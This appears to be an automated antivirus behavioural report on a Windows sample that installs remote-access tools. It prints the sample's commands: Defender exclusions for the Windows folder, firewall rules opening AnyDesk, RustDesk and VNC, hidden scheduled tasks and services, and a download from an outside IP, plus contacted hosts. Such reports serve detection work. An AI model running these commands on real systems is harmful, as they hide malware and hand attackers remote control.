Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\tooykupdate
Sets the following service settings
- [HKLM\System\CurrentControlSet\Services\YService] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\YService] 'ImagePath' = '%WINDIR%\SysWOW64\YKJLFWD\Service.exe /ErrorStdOut -StartS'
- [HKLM\System\CurrentControlSet\Services\YServiceRun] 'ImagePath' = '"%WINDIR%\SysWOW64\YKJLFWD\Service.exe" /ErrorStdOut -RunS'
Creates the following services
- 'YService' %WINDIR%\SysWOW64\YKJLFWD\Service.exe /ErrorStdOut -StartS
- 'YServiceRun' "%WINDIR%\SysWOW64\YKJLFWD\Service.exe" /ErrorStdOut -RunS
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile Add-MpPreference -ExclusionPath %WINDIR%\*
Executes the following
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe" "TTVNC" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe" "RustDesk" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe" "AnyDesk" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe" "YService" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\server.exe" "YServer" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe" "YVPN" ENABLE
Modifies file system
Creates the following files
- %TEMP%\server\yikuai.dat
- %TEMP%\aut6ff3.tmp
- %TEMP%\yksoft.dat
- %TEMP%\aut7052.tmp
- %TEMP%\7-zip32.dll
- %WINDIR%\syswow64\ykjlfwd\server.exe
- nul
- %WINDIR%\syswow64\ykjlfwd\ico.ico
- %WINDIR%\syswow64\ykjlfwd\service.exe
- %WINDIR%\temp\autc9f2.tmp
- %WINDIR%\temp\2336ghgmydv
- %WINDIR%\temp\autd9cb.tmp
- %WINDIR%\temp\2552speqmci
- %WINDIR%\temp\autec70.tmp
- %TEMP%\autbd94.tmp
- %TEMP%\1536arqvyma
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\b9i3oqbl\desktop.ini
- %TEMP%\server\intall1.jpg
- %TEMP%\server\server.exe
- %TEMP%\autcd5c.tmp
- %TEMP%\560poaookq
- %TEMP%\autce18.tmp
- %TEMP%\intall2.jpg
- %TEMP%\server\ico.ico
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\5vu2ouyd\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\wbn0z4at\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\082hn6m5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %WINDIR%\temp\1532ruutswa
- %WINDIR%\temp\download.dat
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\5vu2ouyd\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\wbn0z4at\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\082hn6m5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\b9i3oqbl\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
Deletes the following files
- %TEMP%\autcd5c.tmp
- %WINDIR%\temp\autec70.tmp
- %WINDIR%\temp\2552speqmci
- %WINDIR%\temp\autd9cb.tmp
- %WINDIR%\temp\2336ghgmydv
- %WINDIR%\temp\autc9f2.tmp
- %TEMP%\1536arqvyma
- %WINDIR%\temp\1532ruutswa
- %TEMP%\autbd94.tmp
- %TEMP%\7-zip32.dll
- %TEMP%\aut7052.tmp
- %TEMP%\aut6ff3.tmp
- <SYSTEM32>\tasks\tooykupdate
- %TEMP%\autce18.tmp
- %TEMP%\560poaookq
- %TEMP%\yksoft.dat
- %WINDIR%\temp\download.dat
Network activity
Connects to
- 'to##k.com':80
- '47.##0.240.250':9000
- 'yt.##oyk.com':4900
TCP
HTTP GET requests
- http://www.to##k.com/onekey.dat
Other
- 'yt.##oyk.com':4900
UDP
- DNS ASK to##k.com
- DNS ASK yt.##oyk.com
Miscellaneous
Searches for the following windows
- ClassName: 'EDIT' WindowName: ''
Creates and executes the following
- '%TEMP%\server\server.exe' /ErrorStdOut
- '%WINDIR%\syswow64\ykjlfwd\server.exe' /ErrorStdOut -upfile-s
- '%WINDIR%\syswow64\ykjlfwd\service.exe' /ErrorStdOut -SetSoftwareSASGeneration
- '%WINDIR%\syswow64\ykjlfwd\service.exe' /ErrorStdOut -RunS
- '%WINDIR%\syswow64\ykjlfwd\service.exe' /ErrorStdOut -StartS
- '%WINDIR%\syswow64\ykjlfwd\service.exe' /ErrorStdOut -RepairS
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Server.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /TN TooykUpdate /RU user /SC ONCE /ST 10:30:00 /RL HIGHEST /F /TR "\"<Full path to file>\" /Task"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c rename %WINDIR%\SysWOW64\rserver30\wsock32_bak wsock32.dll' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c if not exist "%WINDIR%\SysWOW64\ykjlfwd\ttvncs.exe" (echo [FileList]>%WINDIR%\TEMP\Download.dat&echo %WINDIR%\SysWOW64\ykjlfwd\cabs.dat=^|^|^|^|^|http://47.100.137.238:8888/chfs/shared/9005l...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile Add-MpPreference -ExclusionPath %WINDIR%\*' (with hidden window)
- '%WINDIR%\syswow64\mmc.exe' %WINDIR%\SysWOW64\GPEDIT.MSC' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c chcp 65001 & schtasks /run /TN TooykUpdate /I' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /delete /TN TooykUpdate /F' (with hidden window)
- '<SYSTEM32>\query.exe' user' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\server.exe" "YServer" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe" "YVPN" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\ykjlfwd\service.exe' /ErrorStdOut -StartS' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "SoftwareSASGeneration" /t REG_DWORD /d "3" /f' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe" "AnyDesk" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe" "RustDesk" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe" "TTVNC" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe" "YService" ENABLE' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe" "RustDesk" ENABLE
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe" "AnyDesk" ENABLE
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe" "YService" ENABLE
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\server.exe" "YServer" ENABLE
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe" "YVPN" ENABLE
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall add allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe" "TTVNC" ENABLE
- '<SYSTEM32>\query.exe' user
- '<SYSTEM32>\mmc.exe' %WINDIR%\SysWOW64\GPEDIT.MSC
- '%WINDIR%\syswow64\mmc.exe' %WINDIR%\SysWOW64\GPEDIT.MSC -32
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile Add-MpPreference -ExclusionPath %WINDIR%\*
- '%WINDIR%\syswow64\cmd.exe' /c if not exist "%WINDIR%\SysWOW64\ykjlfwd\ttvncs.exe" (echo [FileList]>%WINDIR%\TEMP\Download.dat&echo %WINDIR%\SysWOW64\ykjlfwd\cabs.dat=^|^|^|^|^|http://47.100.137.238:8888/chfs/shared/9005l...
- '%WINDIR%\syswow64\cmd.exe' /c rename %WINDIR%\SysWOW64\rserver30\wsock32_bak wsock32.dll
- '<SYSTEM32>\quser.exe'
- '%WINDIR%\syswow64\mmc.exe' %WINDIR%\SysWOW64\GPEDIT.MSC
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%ProgramFiles(x86)%\AnyDesk\AnyDesk.exe"
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\RustDesk.exe"
- '%WINDIR%\syswow64\schtasks.exe' /create /TN TooykUpdate /RU user /SC ONCE /ST 10:30:00 /RL HIGHEST /F /TR "\"<Full path to file>\" /Task"
- '%WINDIR%\syswow64\cmd.exe' /c chcp 65001 & schtasks /run /TN TooykUpdate /I
- '%WINDIR%\syswow64\chcp.com' 65001
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /delete /TN TooykUpdate /F
- '%WINDIR%\syswow64\schtasks.exe' /delete /TN TooykUpdate /F
- '%WINDIR%\syswow64\schtasks.exe' /run /TN TooykUpdate /I
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /TN TooykUpdate /RU user /SC ONCE /ST 10:30:00 /RL HIGHEST /F /TR "\"<Full path to file>\" /Task"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe"
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Service.exe"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Server.exe"
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\Server.exe"
- '%WINDIR%\syswow64\cmd.exe' /c netsh firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe"
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\vpn.exe"
- '%WINDIR%\syswow64\netsh.exe' firewall delete allowedprogram "%WINDIR%\SysWOW64\YKJLFWD\ttvncs.exe"
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "SoftwareSASGeneration" /t REG_DWORD /d "3" /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "SoftwareSASGeneration" /t REG_DWORD /d "3" /f
